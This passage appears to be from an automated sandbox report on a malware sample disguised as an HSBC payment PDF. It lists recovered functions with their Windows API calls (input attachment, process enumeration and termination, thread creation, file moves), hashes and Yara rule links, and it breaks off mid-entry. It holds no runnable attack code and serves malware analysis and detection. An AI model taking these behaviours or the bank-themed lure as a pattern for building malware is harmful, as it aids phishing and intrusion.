                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                    • API String ID: 1704125052-3381328864
                                                                                                                                                    • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                                                                                                                    • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                                                                                                                                                    • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                                                                                                                    • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                                                                                                                                                    Function 004611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004611F0
                                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                                    • Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                                                                                                                    • Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
                                                                                                                                                    • Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                                                                                                                    • Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
                                                                                                                                                    Function 00479113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                                                                                    • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                    • API String ID: 2862541840-2080382077
                                                                                                                                                    • Opcode ID: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
                                                                                                                                                    • Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
                                                                                                                                                    • Opcode Fuzzy Hash: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
                                                                                                                                                    • Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
                                                                                                                                                    Function 0045A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ChildEnumWindows
                                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                    • API String ID: 3555792229-1603158881
                                                                                                                                                    • Opcode ID: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                                                                                                                                                    • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                                                                                                                                                    • Opcode Fuzzy Hash: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                                                                                                                                                    • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
                                                                                                                                                    Function 00402E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                                                                                                                                                      • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                                                                                                                                                      • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                                                                                                                                                      • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                                                                                                                                                    • GetDC.USER32 ref: 0043CD32
                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                    • String ID: U
                                                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                                                    • Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                                                                                                                    • Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
                                                                                                                                                    • Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                                                                                                                                    • Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
                                                                                                                                                    Function 00478C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
                                                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00478F00
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 560350794-0
                                                                                                                                                    • Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                                                                                                                    • Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
                                                                                                                                                    • Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                                                                                                                    • Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
                                                                                                                                                    Function 00464CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                                                                                                                                      • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                                                                                                                                      • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                                                                                                                                                    • _wcscmp.LIBCMT ref: 00464D5A
                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00464D75
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 793581249-0
                                                                                                                                                    • Opcode ID: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                                                                                                                    • Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
                                                                                                                                                    • Opcode Fuzzy Hash: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                                                                                                                    • Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
                                                                                                                                                    Function 00488645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InvalidateRect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 634782764-0
                                                                                                                                                    • Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                                                                                                    • Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
                                                                                                                                                    • Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                                                                                                    • Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
                                                                                                                                                    Function 00402B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                                                                                                                                                    • DestroyIcon.USER32(00000000), ref: 0043C37F
                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                                                                                                                                                    • DestroyIcon.USER32(?), ref: 0043C3AB
                                                                                                                                                      • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2819616528-0
                                                                                                                                                    • Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                                                                                                                    • Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
                                                                                                                                                    • Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                                                                                                                    • Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
                                                                                                                                                    Function 00458921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
                                                                                                                                                    • GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                                    • Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                                                                                                                    • Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
                                                                                                                                                    • Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                                                                                                                    • Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
                                                                                                                                                    Function 00486D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
                                                                                                                                                    • _wcscat.LIBCMT ref: 00486EAD
                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
                                                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                                                                                    • String ID: SysListView32
                                                                                                                                                    • API String ID: 307300125-78025650
                                                                                                                                                    • Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                                                                                                    • Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
                                                                                                                                                    • Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                                                                                                    • Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
                                                                                                                                                    Function 0047E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                                                                                                                                                      • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                                                                                                                                                      • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0047E9B7
                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
